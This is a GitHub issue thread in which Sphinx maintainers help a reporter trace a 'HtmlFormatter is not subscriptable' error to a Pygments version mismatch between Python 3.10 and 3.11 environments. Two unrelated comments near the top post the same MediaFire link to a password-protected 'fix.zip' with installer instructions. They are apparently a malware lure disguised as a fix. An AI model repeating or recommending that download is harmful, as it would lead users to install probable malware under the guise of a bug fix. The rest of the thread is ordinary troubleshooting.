### ISSUE TITLE
TypeError: type 'xxx' is not subscriptable

### ISSUE THREAD

**Issue by ShihouinYoruichi** [sphinx-doc/sphinx#12824]
### Describe the bug

When casually doing `sphinx-build` command, it creates the following critical error.

[Root Cause](https://github.com/danieleades/sphinx/blob/6562610fce2b277505ec115953511e9e77c4523c/sphinx/highlighting.py#L89-L90)

[Related Pull Request](https://github.com/sphinx-doc/sphinx/pull/12619/files#)

```
sphinx-build src docs/

Traceback (most recent call last):
  File "/home/linuxbrew/.linuxbrew/bin/sphinx-build", line 5, in <module>
    from sphinx.cmd.build import main
  File "/home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages/sphinx/cmd/build.py", line 21, in <module>
    from sphinx.application import Sphinx
  File "/home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages/sphinx/application.py", line 30, in <module>
    from sphinx.highlighting import lexer_classes
  File "/home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages/sphinx/highlighting.py", line 86, in <module>
    class PygmentsBridge:
  File "/home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages/sphinx/highlighting.py", line 89, in PygmentsBridge
    html_formatter = HtmlFormatter[str]
                     ~~~~~~~~~~~~~^^^^^
TypeError: type 'HtmlFormatter' is not subscriptable
```

### How to Reproduce

Run `sphinx-build` command

### Environment Information

```text
Please paste all output below into the bug report template



Platform:              linux; (Linux-6.8.0-40-generic-x86_64-with-glibc2.35)
Python version:        3.10.14 (main, May  6 2024, 19:42:50) [GCC 11.2.0])
Python implementation: CPython
Sphinx version:        8.1.0
Docutils version:      0.21.2
Jinja2 version:        3.1.3
Pygments version:      2.18.0
```

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jayaddison** [comment]
I think that #12619 implicitly added a dependency on https://github.com/pygments/pygments/pull/2665 -- a feature available from `Pygments>=2.18`.

Perhaps the simplest fix is to update that dependency version in our `pyproject.toml`?  (`pygments` v2.18 added a requirement for Py3.8+ ; Sphinx [dropped support for Py3.8](https://github.com/sphinx-doc/sphinx/commit/ad61e4115776846b917f0a0f0a0bedbc06d6e1a3) in v7.2.0)

cc @danieleades

**Comment by danieleades** [comment]
> I think that #12619 implicitly added a dependency on [pygments/pygments#2665](https://github.com/pygments/pygments/pull/2665) -- a feature available from `Pygments>=2.18`.
> 
> Perhaps the simplest fix is to update that dependency version in our `pyproject.toml`? (`pygments` v2.18 added a requirement for Py3.8+ ; Sphinx [dropped support for Py3.8](https://github.com/sphinx-doc/sphinx/commit/ad61e4115776846b917f0a0f0a0bedbc06d6e1a3) in v7.2.0)
> 
> cc @danieleades

makes sense to me!

**Comment by jayaddison** [comment]
@ShihouinYoruichi thank you for the bugreport.  If possible, could you check whether the change suggested in #12828 -- increasing the `pygments` dependency to version `2.18` or greater -- resolves the problem?

**Comment by ShihouinYoruichi** [comment]
@jayaddison 

Thank you so much for paying attention to this issue :)
I just tried your suggestion and below is the result.
I forcefully installed all the dependent packages using the following command. Unfortunately, the same error was still there.

```
pip install ~/sphinx --force

Processing /home/minsuseo/sphinx
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Collecting sphinxcontrib-applehelp>=1.0.7 (from Sphinx==8.1.0)
  Using cached sphinxcontrib_applehelp-2.0.0-py3-none-any.whl.metadata (2.3 kB)
Collecting sphinxcontrib-devhelp>=1.0.6 (from Sphinx==8.1.0)
  Using cached sphinxcontrib_devhelp-2.0.0-py3-none-any.whl.metadata (2.3 kB)
Collecting sphinxcontrib-htmlhelp>=2.0.6 (from Sphinx==8.1.0)
  Using cached sphinxcontrib_htmlhelp-2.1.0-py3-none-any.whl.metadata (2.3 kB)
Collecting sphinxcontrib-jsmath>=1.0.1 (from Sphinx==8.1.0)
  Using cached sphinxcontrib_jsmath-1.0.1-py2.py3-none-any.whl.metadata (1.4 kB)
Collecting sphinxcontrib-qthelp>=1.0.6 (from Sphinx==8.1.0)
  Using cached sphinxcontrib_qthelp-2.0.0-py3-none-any.whl.metadata (2.3 kB)
Collecting sphinxcontrib-serializinghtml>=1.1.9 (from Sphinx==8.1.0)
  Using cached sphinxcontrib_serializinghtml-2.0.0-py3-none-any.whl.metadata (2.4 kB)
Collecting Jinja2>=3.1 (from Sphinx==8.1.0)
  Using cached jinja2-3.1.4-py3-none-any.whl.metadata (2.6 kB)
Collecting Pygments>=2.18 (from Sphinx==8.1.0)
  Using cached pygments-2.18.0-py3-none-any.whl.metadata (2.5 kB)
Collecting docutils<0.22,>=0.20 (from Sphinx==8.1.0)
  Using cached docutils-0.21.2-py3-none-any.whl.metadata (2.8 kB)
Collecting snowballstemmer>=2.2 (from Sphinx==8.1.0)
  Using cached snowballstemmer-2.2.0-py2.py3-none-any.whl.metadata (6.5 kB)
Collecting babel>=2.13 (from Sphinx==8.1.0)
  Using cached babel-2.16.0-py3-none-any.whl.metadata (1.5 kB)
Collecting alabaster>=0.7.14 (from Sphinx==8.1.0)
  Using cached alabaster-1.0.0-py3-none-any.whl.metadata (2.8 kB)
Collecting imagesize>=1.3 (from Sphinx==8.1.0)
  Using cached imagesize-1.4.1-py2.py3-none-any.whl.metadata (1.5 kB)
Collecting requests>=2.30.0 (from Sphinx==8.1.0)
  Using cached requests-2.32.3-py3-none-any.whl.metadata (4.6 kB)
Collecting packaging>=23.0 (from Sphinx==8.1.0)
  Using cached packaging-24.1-py3-none-any.whl.metadata (3.2 kB)
Collecting tomli>=2 (from Sphinx==8.1.0)
  Using cached tomli-2.0.1-py3-none-any.whl.metadata (8.9 kB)
Collecting MarkupSafe>=2.0 (from Jinja2>=3.1->Sphinx==8.1.0)
  Using cached MarkupSafe-2.1.5-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (3.0 kB)
Collecting charset-normalizer<4,>=2 (from requests>=2.30.0->Sphinx==8.1.0)
  Using cached charset_normalizer-3.3.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (33 kB)
Collecting idna<4,>=2.5 (from requests>=2.30.0->Sphinx==8.1.0)
  Using cached idna-3.8-py3-none-any.whl.metadata (9.9 kB)
Collecting urllib3<3,>=1.21.1 (from requests>=2.30.0->Sphinx==8.1.0)
  Using cached urllib3-2.2.2-py3-none-any.whl.metadata (6.4 kB)
Collecting certifi>=2017.4.17 (from requests>=2.30.0->Sphinx==8.1.0)
  Using cached certifi-2024.7.4-py3-none-any.whl.metadata (2.2 kB)
Using cached alabaster-1.0.0-py3-none-any.whl (13 kB)
Using cached babel-2.16.0-py3-none-any.whl (9.6 MB)
Using cached docutils-0.21.2-py3-none-any.whl (587 kB)
Using cached imagesize-1.4.1-py2.py3-none-any.whl (8.8 kB)
Using cached jinja2-3.1.4-py3-none-any.whl (133 kB)
Using cached packaging-24.1-py3-none-any.whl (53 kB)
Using cached pygments-2.18.0-py3-none-any.whl (1.2 MB)
Using cached requests-2.32.3-py3-none-any.whl (64 kB)
Using cached snowballstemmer-2.2.0-py2.py3-none-any.whl (93 kB)
Using cached sphinxcontrib_applehelp-2.0.0-py3-none-any.whl (119 kB)
Using cached sphinxcontrib_devhelp-2.0.0-py3-none-any.whl (82 kB)
Using cached sphinxcontrib_htmlhelp-2.1.0-py3-none-any.whl (98 kB)
Using cached sphinxcontrib_jsmath-1.0.1-py2.py3-none-any.whl (5.1 kB)
Using cached sphinxcontrib_qthelp-2.0.0-py3-none-any.whl (88 kB)
Using cached sphinxcontrib_serializinghtml-2.0.0-py3-none-any.whl (92 kB)
Using cached tomli-2.0.1-py3-none-any.whl (12 kB)
Using cached certifi-2024.7.4-py3-none-any.whl (162 kB)
Using cached charset_normalizer-3.3.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (142 kB)
Using cached idna-3.8-py3-none-any.whl (66 kB)
Using cached MarkupSafe-2.1.5-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (25 kB)
Using cached urllib3-2.2.2-py3-none-any.whl (121 kB)
Building wheels for collected packages: Sphinx
  Building wheel for Sphinx (pyproject.toml) ... done
  Created wheel for Sphinx: filename=sphinx-8.1.0-py3-none-any.whl size=3506627 sha256=593b771056376659a5ecf30e3fb8ef6e480eca1cd610fb38df1ecd5d2a0469ee
  Stored in directory: /tmp/pip-ephem-wheel-cache-26mrta2w/wheels/07/e7/ad/85421114935222a209c53988c436b0823bc83c2ae5377ce03a
Successfully built Sphinx
Installing collected packages: snowballstemmer, urllib3, tomli, sphinxcontrib-serializinghtml, sphinxcontrib-qthelp, sphinxcontrib-jsmath, sphinxcontrib-htmlhelp, sphinxcontrib-devhelp, sphinxcontrib-applehelp, Pygments, packaging, MarkupSafe, imagesize, idna, docutils, charset-normalizer, certifi, babel, alabaster, requests, Jinja2, Sphinx
  Attempting uninstall: snowballstemmer
    Found existing installation: snowballstemmer 2.2.0
    Uninstalling snowballstemmer-2.2.0:
      Successfully uninstalled snowballstemmer-2.2.0
  Attempting uninstall: urllib3
    Found existing installation: urllib3 2.2.2
    Uninstalling urllib3-2.2.2:
      Successfully uninstalled urllib3-2.2.2
  Attempting uninstall: tomli
    Found existing installation: tomli 2.0.1
    Uninstalling tomli-2.0.1:
      Successfully uninstalled tomli-2.0.1
  Attempting uninstall: sphinxcontrib-serializinghtml
    Found existing installation: sphinxcontrib-serializinghtml 2.0.0
    Uninstalling sphinxcontrib-serializinghtml-2.0.0:
      Successfully uninstalled sphinxcontrib-serializinghtml-2.0.0
  Attempting uninstall: sphinxcontrib-qthelp
    Found existing installation: sphinxcontrib-qthelp 2.0.0
    Uninstalling sphinxcontrib-qthelp-2.0.0:
      Successfully uninstalled sphinxcontrib-qthelp-2.0.0
  Attempting uninstall: sphinxcontrib-jsmath
    Found existing installation: sphinxcontrib-jsmath 1.0.1
    Uninstalling sphinxcontrib-jsmath-1.0.1:
      Successfully uninstalled sphinxcontrib-jsmath-1.0.1
  Attempting uninstall: sphinxcontrib-htmlhelp
    Found existing installation: sphinxcontrib-htmlhelp 2.1.0
    Uninstalling sphinxcontrib-htmlhelp-2.1.0:
      Successfully uninstalled sphinxcontrib-htmlhelp-2.1.0
  Attempting uninstall: sphinxcontrib-devhelp
    Found existing installation: sphinxcontrib-devhelp 2.0.0
    Uninstalling sphinxcontrib-devhelp-2.0.0:
      Successfully uninstalled sphinxcontrib-devhelp-2.0.0
  Attempting uninstall: sphinxcontrib-applehelp
    Found existing installation: sphinxcontrib-applehelp 2.0.0
    Uninstalling sphinxcontrib-applehelp-2.0.0:
      Successfully uninstalled sphinxcontrib-applehelp-2.0.0
  Attempting uninstall: Pygments
    Found existing installation: Pygments 2.18.0
    Uninstalling Pygments-2.18.0:
      Successfully uninstalled Pygments-2.18.0
  Attempting uninstall: packaging
    Found existing installation: packaging 24.1
    Uninstalling packaging-24.1:
      Successfully uninstalled packaging-24.1
  Attempting uninstall: MarkupSafe
    Found existing installation: MarkupSafe 2.1.5
    Uninstalling MarkupSafe-2.1.5:
      Successfully uninstalled MarkupSafe-2.1.5
  Attempting uninstall: imagesize
    Found existing installation: imagesize 1.4.1
    Uninstalling imagesize-1.4.1:
      Successfully uninstalled imagesize-1.4.1
  Attempting uninstall: idna
    Found existing installation: idna 3.8
    Uninstalling idna-3.8:
      Successfully uninstalled idna-3.8
  Attempting uninstall: docutils
    Found existing installation: docutils 0.21.2
    Uninstalling docutils-0.21.2:
      Successfully uninstalled docutils-0.21.2
  Attempting uninstall: charset-normalizer
    Found existing installation: charset-normalizer 3.3.2
    Uninstalling charset-normalizer-3.3.2:
      Successfully uninstalled charset-normalizer-3.3.2
  Attempting uninstall: certifi
    Found existing installation: certifi 2024.7.4
    Uninstalling certifi-2024.7.4:
      Successfully uninstalled certifi-2024.7.4
  Attempting uninstall: babel
    Found existing installation: babel 2.16.0
    Uninstalling babel-2.16.0:
      Successfully uninstalled babel-2.16.0
  Attempting uninstall: alabaster
    Found existing installation: alabaster 1.0.0
    Uninstalling alabaster-1.0.0:
      Successfully uninstalled alabaster-1.0.0
  Attempting uninstall: requests
    Found existing installation: requests 2.32.3
    Uninstalling requests-2.32.3:
      Successfully uninstalled requests-2.32.3
  Attempting uninstall: Jinja2
    Found existing installation: Jinja2 3.1.4
    Uninstalling Jinja2-3.1.4:
      Successfully uninstalled Jinja2-3.1.4
  Attempting uninstall: Sphinx
    Found existing installation: Sphinx 8.1.0
    Uninstalling Sphinx-8.1.0:
      Successfully uninstalled Sphinx-8.1.0
ERROR: pip's dependency resolver does not currently take into account all the packages that are installed. This behaviour is the source of the following dependency conflicts.
dask-expr 1.1.0 requires pandas>=2, but you have pandas 1.5.3 which is incompatible.
streamlit 1.32.0 requires packaging<24,>=16.8, but you have packaging 24.1 which is incompatible.
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Pygments-2.18.0 Sphinx-8.1.0 alabaster-1.0.0 babel-2.16.0 certifi-2024.7.4 charset-normalizer-3.3.2 docutils-0.21.2 idna-3.8 imagesize-1.4.1 packaging-24.1 requests-2.32.3 snowballstemmer-2.2.0 sphinxcontrib-applehelp-2.0.0 sphinxcontrib-devhelp-2.0.0 sphinxcontrib-htmlhelp-2.1.0 sphinxcontrib-jsmath-1.0.1 sphinxcontrib-qthelp-2.0.0 sphinxcontrib-serializinghtml-2.0.0 tomli-2.0.1 urllib3-2.2.2

```


```
sphinx-build src docs

Traceback (most recent call last):
  File "/home/linuxbrew/.linuxbrew/bin/sphinx-build", line 5, in <module>
    from sphinx.cmd.build import main
  File "/home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages/sphinx/cmd/build.py", line 21, in <module>
    from sphinx.application import Sphinx
  File "/home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages/sphinx/application.py", line 30, in <module>
    from sphinx.highlighting import lexer_classes
  File "/home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages/sphinx/highlighting.py", line 86, in <module>
    class PygmentsBridge:
  File "/home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages/sphinx/highlighting.py", line 89, in PygmentsBridge
    html_formatter = HtmlFormatter[str]
                     ~~~~~~~~~~~~~^^^^^
TypeError: type 'HtmlFormatter' is not subscriptable
```

**Comment by jayaddison** [comment]
Ok, thank you; and also my apologies for not noticing that in fact, `pygments 2.18` was already installed when this issue first appeared.

So, it appears not to be resolved by installation/requirement of that version.

**Comment by AA-Turner** [comment]
The environment seems confusing here -- the logs say Python@3.11, but the debug info says 3.10, and also Sphinx 8.1, which isn't released.

A

**Comment by jayaddison** [comment]
@ShihouinYoruichi as per @AA-Turner's note, it does seem that there is a Python version question here.  In particular: perhaps `sphinx-build` runs using Python3.10, and yet it is somehow loading packages intended for use with Python3.11.

To inspect this, I would suggest running the command below to inspect the installed package base(s):

```sh
$ ls /home/linuxbrew/.linuxbrew/opt/python*
```

**Comment by ShihouinYoruichi** [comment]
@AA-Turner 
Thank you for pointing out that. It's because I use the multiple envs: pyenv, brew, conda on Ubuntu 22.04. So I have to specify the Python binary path when running sphinx report command if there's such parameter.

As far as I know 3.10 and 3.11 are compatible to each other well, compared to that of between 3.9 and 3.10 or 3.8 and 3.9.

On top of that, the following command is the way I normally install sphinx locally.
``` git clone https://github.com/sphinx-doc/sphinx ~/sphinx; pip install ~/sphinx ```

@jayaddison 
I noticed your comment while writing this comment. Here is the result.
 
```
/home/linuxbrew/.linuxbrew/opt/python@3

/home/linuxbrew/.linuxbrew/opt/python@3.11:
bin  include  INSTALL_RECEIPT.json  lib  libexec  LICENSE  README.rst  sbom.spdx.json  share
```

**Comment by ShihouinYoruichi** [comment]
@jayaddison
CC: @AA-Turner 

Thanks to your support, the problem has been resolved.

====== before (Python 3.10) ======
```
Python 3.10.14 (main, May  6 2024, 19:42:50) [GCC 11.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pygments
>>> from pygments.formatter import Formatter
>>> from pygments.formatters.html import HtmlFormatter
>>> pygments.__version__
'2.18.0'
>>> Formatter.__class_getitem__
<bound method Formatter.__class_getitem__ of <class 'pygments.formatter.Formatter'>>
>>> HtmlFormatter.__class_getitem__
<bound method Formatter.__class_getitem__ of <class 'pygments.formatters.html.HtmlFormatter'>>
>>> Formatter[str]
<class 'pygments.formatter.Formatter'>
>>> HtmlFormatter[str]
<class 'pygments.formatters.html.HtmlFormatter'>
>>> exit()
```

====== before (Python 3.11) ======
```
Python 3.11.9 (main, Apr  2 2024, 08:25:04) [GCC 11.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pygments
>>> from pygments.formatter import Formatter
>>> from pygments.formatters.html import HtmlFormatter
>>> pygments.__version__
'2.17.2'
>>> Formatter.__class_getitem__
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: type object 'Formatter' has no attribute '__class_getitem__'
>>> HtmlFormatter.__class_getitem__
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
AttributeError: type object 'HtmlFormatter' has no attribute '__class_getitem__'
>>> Formatter[str]
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: type 'Formatter' is not subscriptable
>>> HtmlFormatter[str]
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: type 'HtmlFormatter' is not subscriptable
>>> exit()
```

I ran the following key command specifying the python binary file.
`pip --python /home/linuxbrew/.linuxbrew/opt/python@3.11/bin/python3.11 install ~/sphinx/`

Below is its result.
```
Processing /home/minsuseo/sphinx
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Requirement already satisfied: sphinxcontrib-applehelp>=1.0.7 in /home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages (from Sphinx==8.1.0) (1.0.8)
Requirement already satisfied: sphinxcontrib-devhelp>=1.0.6 in /home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages (from Sphinx==8.1.0) (1.0.6)
Collecting sphinxcontrib-htmlhelp>=2.0.6 (from Sphinx==8.1.0)
  Using cached sphinxcontrib_htmlhelp-2.1.0-py3-none-any.whl.metadata (2.3 kB)
Requirement already satisfied: sphinxcontrib-jsmath>=1.0.1 in /home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages (from Sphinx==8.1.0) (1.0.1)
Requirement already satisfied: sphinxcontrib-qthelp>=1.0.6 in /home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages (from Sphinx==8.1.0) (1.0.7)
Requirement already satisfied: sphinxcontrib-serializinghtml>=1.1.9 in /home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages (from Sphinx==8.1.0) (1.1.10)
Requirement already satisfied: Jinja2>=3.1 in /home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages (from Sphinx==8.1.0) (3.1.4)
Collecting Pygments>=2.18 (from Sphinx==8.1.0)
  Using cached pygments-2.18.0-py3-none-any.whl.metadata (2.5 kB)
Requirement already satisfied: docutils<0.22,>=0.20 in /home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages (from Sphinx==8.1.0) (0.21.2)
Requirement already satisfied: snowballstemmer>=2.2 in /home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages (from Sphinx==8.1.0) (2.2.0)
Requirement already satisfied: babel>=2.13 in /home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages (from Sphinx==8.1.0) (2.15.0)
Requirement already satisfied: alabaster>=0.7.14 in /home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages (from Sphinx==8.1.0) (0.7.16)
Requirement already satisfied: imagesize>=1.3 in /home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages (from Sphinx==8.1.0) (1.4.1)
Requirement already satisfied: requests>=2.30.0 in /home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages (from Sphinx==8.1.0) (2.31.0)
Requirement already satisfied: packaging>=23.0 in /home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages (from Sphinx==8.1.0) (23.2)
Requirement already satisfied: MarkupSafe>=2.0 in /home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages (from Jinja2>=3.1->Sphinx==8.1.0) (2.1.5)
Requirement already satisfied: charset-normalizer<4,>=2 in /home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages (from requests>=2.30.0->Sphinx==8.1.0) (3.3.2)
Requirement already satisfied: idna<4,>=2.5 in /home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages (from requests>=2.30.0->Sphinx==8.1.0) (3.6)
Requirement already satisfied: urllib3<3,>=1.21.1 in /home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages (from requests>=2.30.0->Sphinx==8.1.0) (1.26.18)
Requirement already satisfied: certifi>=2017.4.17 in /home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages (from requests>=2.30.0->Sphinx==8.1.0) (2023.11.17)
Using cached pygments-2.18.0-py3-none-any.whl (1.2 MB)
Using cached sphinxcontrib_htmlhelp-2.1.0-py3-none-any.whl (98 kB)
Building wheels for collected packages: Sphinx
  Building wheel for Sphinx (pyproject.toml) ... done
  Created wheel for Sphinx: filename=sphinx-8.1.0-py3-none-any.whl size=3506627 sha256=593b771056376659a5ecf30e3fb8ef6e480eca1cd610fb38df1ecd5d2a0469ee
  Stored in directory: /tmp/pip-ephem-wheel-cache-xcdiytiv/wheels/39/d1/44/5203b433994bb0d6f32301a6ad858c94749fe507ee42177165
Successfully built Sphinx
Installing collected packages: sphinxcontrib-htmlhelp, Pygments, Sphinx
  Attempting uninstall: sphinxcontrib-htmlhelp
    Found existing installation: sphinxcontrib-htmlhelp 2.0.5
    Uninstalling sphinxcontrib-htmlhelp-2.0.5:
      Successfully uninstalled sphinxcontrib-htmlhelp-2.0.5
  Attempting uninstall: Pygments
    Found existing installation: Pygments 2.17.2
    Uninstalling Pygments-2.17.2:
      Successfully uninstalled Pygments-2.17.2
  Attempting uninstall: Sphinx
    Found existing installation: Sphinx 8.0.0rc1
    Uninstalling Sphinx-8.0.0rc1:
      Successfully uninstalled Sphinx-8.0.0rc1
Successfully installed Pygments-2.18.0 Sphinx-8.1.0 sphinxcontrib-htmlhelp-2.1.0
```

====== after (Python 3.11) ======
```
Python 3.11.9 (main, Apr  2 2024, 08:25:04) [GCC 11.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pygments
>>> from pygments.formatter import Formatter
>>> from pygments.formatters.html import HtmlFormatter
>>> pygments.__version__
'2.18.0'
>>> Formatter.__class_getitem__
<bound method Formatter.__class_getitem__ of <class 'pygments.formatter.Formatter'>>
>>> HtmlFormatter.__class_getitem__
<bound method Formatter.__class_getitem__ of <class 'pygments.formatters.html.HtmlFormatter'>>
>>> Formatter[str]
<class 'pygments.formatter.Formatter'>
>>> HtmlFormatter[str]
<class 'pygments.formatters.html.HtmlFormatter'>
>>> exit()
```

Now, `sphinx-build` command works fine. :)

**Comment by ShihouinYoruichi** [comment]
Meanwhile, I might be curious about the reason behind of the following warning after running `sphinx-build` command.

```
/home/linuxbrew/.linuxbrew/opt/python@3.11/lib/python3.11/site-packages/notfound/extension.py:269: RemovedInSphinx90Warning: The '_Opt' object tuple interface is deprecated, use attribute access instead for 'default', 'rebuild', and 'valid_types'.
  default, rebuild, types = app.config.values.get('notfound_urls_prefix')
```

**Comment by AA-Turner** [comment]
That's a warning generated by the `sphinx-notfound` extension -- please report it to them.

A

**Comment by ShihouinYoruichi** [comment]
For the record to the above warning,
[sphinx-notfound-page](https://github.com/readthedocs/sphinx-notfound-page/issues/246)

**Comment by jayaddison** [comment]
Thank you @ShihouinYoruichi, glad to hear that this is resolved - and thank you also for reporting the subsequent warning message to the relevant project.
